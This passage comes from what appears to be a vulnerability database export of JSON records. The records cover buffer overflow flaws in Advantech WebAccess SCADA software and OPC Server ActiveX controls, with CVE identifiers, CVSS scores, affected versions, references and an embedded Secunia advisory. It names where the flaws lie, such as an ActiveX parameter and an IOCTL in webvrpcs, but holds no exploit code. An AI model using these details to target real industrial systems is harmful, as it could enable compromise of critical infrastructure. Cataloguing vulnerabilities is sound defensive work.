the application", "sources": [ { "db": "CNVD", "id": "CNVD-2016-10222" }, { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" } ], "trust": 0.72 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CNVD", "id": "CNVD-2016-10222", "trust": 0.8 }, { "db": "IVD", "id": "004F69B8-C8BD-4DCD-B795-5D5AE897722A", "trust": 0.2 } ], "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "id": "VAR-201610-0692", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ], "trust": 1.2173957400000002 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "last_update_date": "2022-05-17T02:03:18.177000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess 8.1 ActiveX Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchinfo/show/81226" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-10-27T00:00:00", "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "date": "2016-10-17T00:00:00", "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-10-27T00:00:00", "db": "CNVD", "id": "CNVD-2016-10222" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess 8.1 ActiveX Buffer Overflow Vulnerability", "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" }, { "db": "CNVD", "id": "CNVD-2016-10222" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "004f69b8-c8bd-4dcd-b795-5d5ae897722a" } ], "trust": 0.2 } }
var-201202-0040
Vulnerability from variot
Buffer overflow in an ActiveX control in Advantech/BroadWin WebAccess before 7.0 might allow remote attackers to execute arbitrary code via a long string value in unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0040", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "CNNVD", "id": "CNNVD-201202-406" }, { "db": "NVD", "id": "CVE-2011-4526" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001550" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2011-4526", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2011-4526", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "1a485340-2354-11e6-abef-000c29c66e3d", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "VHN-52471", "impactScore": 10.0, "integrityImpact": "COMPLETE", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2011-4526", "trust": 1.0, "value": "HIGH" }, { "author": "NVD", "id": "CVE-2011-4526", "trust": 0.8, "value": "High" }, { "author": "CNNVD", "id": "CNNVD-201202-406", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-52471", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52471" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "CNNVD", "id": "CNNVD-201202-406" }, { "db": "NVD", "id": "CVE-2011-4526" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow in an ActiveX control in Advantech/BroadWin WebAccess before 7.0 might allow remote attackers to execute arbitrary code via a long string value in unspecified parameters. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2011-4526" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-52471" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2011-4526", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-406", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0661", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001550", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "1A485340-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-52471", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "VULHUB", "id": "VHN-52471" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-406" }, { "db": "NVD", "id": "CVE-2011-4526" } ] }, "id": "VAR-201202-0040", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "VULHUB", "id": "VHN-52471" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0661" } ] }, "last_update_date": "2024-11-23T21:46:31.019000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Buffer Overflow Vulnerability (CNVD-2012-0661)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10173" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-52471" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "NVD", "id": "CVE-2011-4526" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-4526" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2011-4526" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "VULHUB", "id": "VHN-52471" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-406" }, { "db": "NVD", "id": "CVE-2011-4526" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0661" }, { "db": "VULHUB", "id": "VHN-52471" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-406" }, { "db": "NVD", "id": "CVE-2011-4526" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0661" }, { "date": "2012-02-21T00:00:00", "db": "VULHUB", "id": "VHN-52471" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "date": "2011-11-09T12:04:37", "db": "PACKETSTORM", "id": "106765" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-406" }, { "date": "2012-02-21T13:31:56.063000", "db": "NVD", "id": "CVE-2011-4526" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2012-02-20T00:00:00", "db": "CNVD", "id": "CNVD-2012-0661" }, { "date": "2018-01-05T00:00:00", "db": "VULHUB", "id": "VHN-52471" }, { "date": "2012-02-16T00:00:00", "db": "BID", "id": "52051" }, { "date": "2012-02-23T00:00:00", "db": "JVNDB", "id": "JVNDB-2012-001550" }, { "date": "2012-02-22T00:00:00", "db": "CNNVD", "id": "CNNVD-201202-406" }, { "date": "2024-11-21T01:32:28.890000", "db": "NVD", "id": "CVE-2011-4526" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201202-406" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech/BroadWin WebAccess of ActiveX Control buffer overflow vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001550" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "1a485340-2354-11e6-abef-000c29c66e3d" }, { "db": "CNNVD", "id": "CNNVD-201202-406" } ], "trust": 0.8 } }
var-201810-0396
Vulnerability from variot
Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwclient.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech (Advantech) WebAccess software is the core of Advantech's IoT application platform solution, providing users with a user interface based on HTML5 technology to achieve cross-platform and cross-browser data access experience. A stack buffer overflow vulnerability exists in Advantech WebAccess. Advantech WebAccess is prone to the following security vulnerabilities: 1. A directory-traversal vulnerability 3. An arbitrary-file-deletion vulnerability 4. This may aid in further attacks. Advantech WebAccess 8.3.1 and prior versions are vulnerable
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess node", "scope": null, "trust": 9.8, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.3.1" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 0.6, "vendor": "advantech", "version": "\u003c=8.3.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.3" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.2" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "_id": null, "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.3.3" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "e2feefe1-39ab-11e9-8e28-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-1311" }, { "db": "ZDI", "id": "ZDI-18-1312" }, { "db": "ZDI", "id": "ZDI-18-1308" }, { "db": "ZDI", "id": "ZDI-18-1310" 